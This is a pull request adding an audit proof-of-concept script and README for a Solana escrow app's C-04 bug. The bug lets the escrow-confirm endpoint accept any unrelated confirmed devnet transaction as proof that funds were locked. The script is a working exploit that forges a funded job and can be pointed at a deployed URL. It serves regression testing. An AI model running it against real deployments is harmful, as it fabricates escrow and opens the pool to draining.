### PR TITLE
test(audit): PoC reproducer for C-04 (escrow-confirm tx replay)

### DIFF
--- a/scripts/audit/README.md
+++ b/scripts/audit/README.md
@@ -1,0 +1,28 @@
+# Audit PoC scripts
+
+Proof-of-concept exploits demonstrating bugs reported in [`docs/AUDIT.md`](../../docs/AUDIT.md).
+
+| Script | Audit ref | Issue | What it proves |
+|---|---|---|---|
+| [`c04-poc-fake-tx.mjs`](./c04-poc-fake-tx.mjs) | C-04 | wienerlabs/covenant#17 | `/api/escrow/confirm` accepts arbitrary devnet tx hashes as proof of an escrow lock |
+
+## Running
+
+All PoCs are read-only and devnet-only. They will refuse to run against mainnet.
+
+```sh
+# C-04 — fake escrow lock
+node scripts/audit/c04-poc-fake-tx.mjs --base http://localhost:3000 \
+     --wallet <your_devnet_pubkey>
+```
+
+The script targets the locally running Next dev server. To exercise a deployed environment, point `--base` at the deployment URL.
+
+## Why these live in the repo
+
+Keeping reproducers next to the audit doc means:
+- Fixes can be validated against the same script that demonstrated the bug.
+- New contributors can verify the issue is closed before merging a fix.
+- Regression risk is visible in PR review.
+
+Each PoC includes its own audit reference in the file header. When a fix lands, leave the script in place — flip its expected exit code in the corresponding negative test instead.

--- a/scripts/audit/c04-poc-fake-tx.mjs
+++ b/scripts/audit/c04-poc-fake-tx.mjs
@@ -1,0 +1,178 @@
+#!/usr/bin/env node
+/**
+ * Audit PoC — C-04: /api/escrow/confirm accepts arbitrary tx hashes
+ * ===================================================================
+ *
+ * Demonstrates that the escrow-confirm route does NOT validate the
+ * contents of the supplied `escrowTxHash`. Any confirmed devnet tx
+ * (the attacker's own faucet mint, an unrelated swap, even a memo-only
+ * tx by a third party) is accepted as proof of an escrow lock, and a
+ * Job row is created with `escrowLocked: true`.
+ *
+ * Combined with the centralized escrow architecture (C-01) and the
+ * dispute-resolution spoof (C-02), this enables draining the shared
+ * pool by completing the lifecycle on a job that never received funds.
+ *
+ * USAGE
+ * -----
+ *   # Against a local Next dev server:
+ *   node scripts/audit/c04-poc-fake-tx.mjs --base http://localhost:3000 \
+ *        --wallet <attacker_pubkey_base58> \
+ *        --tx <ANY_confirmed_devnet_tx_signature>
+ *
+ *   # If --tx is omitted, the script picks the most recent signature
+ *   # from the public devnet RPC for any random account (e.g. the USDC
+ *   # mint authority) — proving that even unrelated traffic works.
+ *
+ * The PoC is read-only: it does NOT exploit the resulting job for fund
+ * theft. It stops at the moment the API returns `escrowLocked: true`,
+ * which is sufficient to prove the bug.
+ *
+ * AUDIT REF
+ * ---------
+ *   docs/AUDIT.md → C-04
+ *   GitHub issue  → wienerlabs/covenant#17
+ *
+ * SAFE TO RUN
+ * -----------
+ *   - Targets devnet only (mainnet RPC is rejected below).
+ *   - Creates a junk DB row in the local app instance — clean it up via
+ *     `prisma studio` or by dropping the test DB.
+ *   - No real funds move; the whole point is that none ever did.
+ */
+
+import { Connection, PublicKey } from "@solana/web3.js";
+import { argv, exit } from "node:process";
+
+const args = parseArgs(argv.slice(2));
+
+if (!args.wallet) {
+  console.error(
+    "ERROR: --wallet <attacker_pubkey_base58> is required.\n" +
+    "       Generate one with `solana-keygen new --no-bip39-passphrase` if you don't have one."
+  );
+  exit(1);
+}
+
+const baseUrl = args.base ?? "http://localhost:3000";
+const rpc = args.rpc ?? "https://api.devnet.solana.com";
+
+if (rpc.includes("mainnet")) {
+  console.error("ERROR: this PoC refuses to run against mainnet.");
+  exit(1);
+}
+
+const connection = new Connection(rpc, "confirmed");
+
+const txSig = args.tx ?? (await pickRandomConfirmedSignature(connection));
+console.log(`[poc] using tx signature: ${txSig}`);
+
+// Sanity check: the tx must exist and be confirmed (otherwise the route's
+// own minimal check would catch it — we want to prove the SECOND-order bug,
+// where a confirmed-but-unrelated tx still sails through).
+const txInfo = await connection.getTransaction(txSig, {
+  maxSupportedTransactionVersion: 0,
+  commitment: "confirmed",
+});
+if (!txInfo) {
+  console.error(
+    `[poc] supplied tx ${txSig} is not findable on devnet — pick one that is.`
+  );
+  exit(1);
+}
+if (txInfo.meta?.err) {
+  console.error(`[poc] tx reverted, route would reject: ${JSON.stringify(txInfo.meta.err)}`);
+  exit(1);
+}
+console.log(`[poc] tx exists and succeeded; route's existing check passes.`);
+
+// Show that this tx has nothing to do with the attacker's wallet or the
+// escrow ATA — i.e. the route SHOULD reject it after a real check.
+const attackerKey = new PublicKey(args.wallet);
+const accountKeys = txInfo.transaction.message.staticAccountKeys ?? [];
+const attackerInvolved = accountKeys.some((k) => k.equals(attackerKey));
+console.log(
+  `[poc] attacker wallet ${args.wallet} is${attackerInvolved ? "" : " NOT"} an account in the supplied tx.`
+);
+if (attackerInvolved) {
+  console.log(
+    "[poc] note: pick a tx where the attacker is NOT involved to make the unsoundness obvious."
+  );
+}
+
+// The actual exploit call.
+const claimedAmount = Number(args.amount ?? 1); // claim 1 USDC was locked
+const jobData = {
+  title: "PoC fake job",
+  description: "Audit C-04 — no real escrow",
+  requirements: "n/a",
+  category: "text_writing",
+  paymentToken: "USDC",
+  minWords: 10,
+  language: "English",
+  deadline: new Date(Date.now() + 24 * 60 * 60 * 1000).toISOString(),
+};
+
+console.log(`[poc] POSTing /api/escrow/confirm with a tx that has nothing to do with us...`);
+const res = await fetch(`${baseUrl}/api/escrow/confirm`, {
+  method: "POST",
+  headers: { "Content-Type": "application/json" },
+  body: JSON.stringify({
+    posterWallet: args.wallet,
+    amount: claimedAmount,
+    jobData,
+    escrowTxHash: txSig,
+  }),
+});
+
+const body = await res.json().catch(() => ({}));
+console.log(`[poc] HTTP ${res.status}`);
+console.log(JSON.stringify(body, null, 2));
+
+if (res.ok && body.escrowLocked) {
+  console.log("");
+  console.log("==========================================");
+  console.log(" PoC SUCCESS — bug confirmed (C-04)");
+  console.log("==========================================");
+  console.log(" The server created a Job row with");
+  console.log(`   id=${body.id}`);
+  console.log(`   escrowLocked=true`);
+  console.log(" using a tx signature that did not transfer");
+  console.log(` any USDC from ${args.wallet} to the escrow ATA.`);
+  exit(0);
+} else {
+  console.log("");
+  console.log("PoC did not trigger — server may already be patched, or env is misconfigured.");
+  exit(2);
+}
+
+// ---------------------------------------------------------------------------
+
+function parseArgs(arr) {
+  const out = {};
+  for (let i = 0; i < arr.length; i++) {
+    const a = arr[i];
+    if (a.startsWith("--")) {
+      const key = a.slice(2);
+      const next = arr[i + 1];
+      if (!next || next.startsWith("--")) {
+        out[key] = true;
+      } else {
+        out[key] = next;
+        i++;
+      }
+    }
+  }
+  return out;
+}
+
+async function pickRandomConfirmedSignature(conn) {
+  // The USDC mint authority on devnet is a chatty account; grabs work fine
+  // for "any random tx the attacker did not author".
+  const probe = new PublicKey("F7RYRqCy8uWYxjxrXVhU3iUCRwa9bKBUTkGKktpyYueQ"); // test USDC mint
+  const sigs = await conn.getSignaturesForAddress(probe, { limit: 5 });
+  for (const s of sigs) {
+    if (!s.err) return s.signature;
+  }
+  throw new Error("Could not find a recent confirmed signature on devnet — pass --tx explicitly.");
+}


### PR DESCRIPTION
## Summary

Adds [`scripts/audit/c04-poc-fake-tx.mjs`](scripts/audit/c04-poc-fake-tx.mjs) — a Node script that reproduces the C-04 escrow-confirm bug end-to-end against a local Next dev server.

Closes #17 once the corresponding fix PR lands and this PoC starts returning a 400. (We deliberately don't auto-fail on success — the script is a manual diagnostic.)

## What the PoC does

1. Picks (or accepts via `--tx`) any confirmed devnet tx — explicitly one that has nothing to do with the attacker.
2. POSTs `/api/escrow/confirm` with `posterWallet=<attacker>`, `escrowTxHash=<that tx>`, and a fabricated job spec.
3. Asserts the server returns `escrowLocked: true` and a Job row id.

Combined with C-01 (centralized custodial pool) and C-02 (no signature verification), this is the entry point for draining the shared escrow.

## Safety

- Refuses to run if `--rpc` looks like mainnet
- Read-only — does not pursue the second-order theft, just demonstrates the validation gap
- Includes its own audit ref in the file header so it survives moves/refactors
- Lives under `scripts/audit/` with a small README explaining the convention

## Test plan

- [ ] Run against `localhost:3000` with current main → expect "PoC SUCCESS"
- [ ] After the fix PR for #17 lands, re-run → expect HTTP 400 with a clear validation error
- [ ] Confirm `--rpc <mainnet url>` is refused

## Out of scope

- The actual fix lives in a separate PR (closing #17)
- Negative integration tests live in another PR (M-06)